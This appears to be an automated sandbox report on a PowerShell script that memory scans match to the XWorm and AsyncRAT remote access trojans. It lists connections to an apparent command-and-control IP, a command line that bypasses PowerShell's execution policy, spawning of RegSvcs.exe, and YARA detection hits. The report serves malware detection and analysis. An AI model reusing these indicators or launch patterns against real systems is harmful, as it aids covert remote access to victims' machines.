            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: powershell.exe, 00000000.00000002.2397399939.000001DD9F3EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD8F151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4340987484.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD8F151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD8F939000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000000.00000002.2397399939.000001DD9F3EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Source: 0.2.powershell.exe.1dd90374f68.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.1dd90374f68.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.1dd8f552668.4.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.1dd8f552668.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2378338667.000001DD8F5B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF84900103D0_2_00007FF84900103D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_015063403_2_01506340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0150C2D83_2_0150C2D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0150B5983_2_0150B598
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_015084B83_2_015084B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01505A703_2_01505A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01502C883_2_01502C88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_015057283_2_01505728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01500FA03_2_01500FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 880
            Source: 0.2.powershell.exe.1dd90374f68.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.1dd90374f68.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.1dd8f552668.4.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.1dd8f552668.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2378338667.000001DD8F5B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winPS1@7/14@0/1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
            Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\cbXZx2AFPWwoNOX6
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6568
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52lmgopr.pyp.ps1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: b.ps1Virustotal: Detection: 13%
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3716" "2640" "2540" "2656" "0" "0" "2660" "0" "0" "0" "0" "0"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 880
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3716" "2640" "2540" "2656" "0" "0" "2660" "0" "0" "0" "0" "0" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdby source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbC source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb[& source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Core.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbs* source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\RegSvcs.pdb{& source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbj? source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb;&L source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Management.pdb@ source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Xml.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.ni.pdbRSDS source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: n.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbK* source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2405232656.000001DDA75F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdb/ source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Configuration.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdboft.NET/Framework/v4.0.30319/RegSvcs.exe// source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: %%.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp, WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbv source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbtP]q source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Drawing.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Management.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Management.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.pdb4 source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Core.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
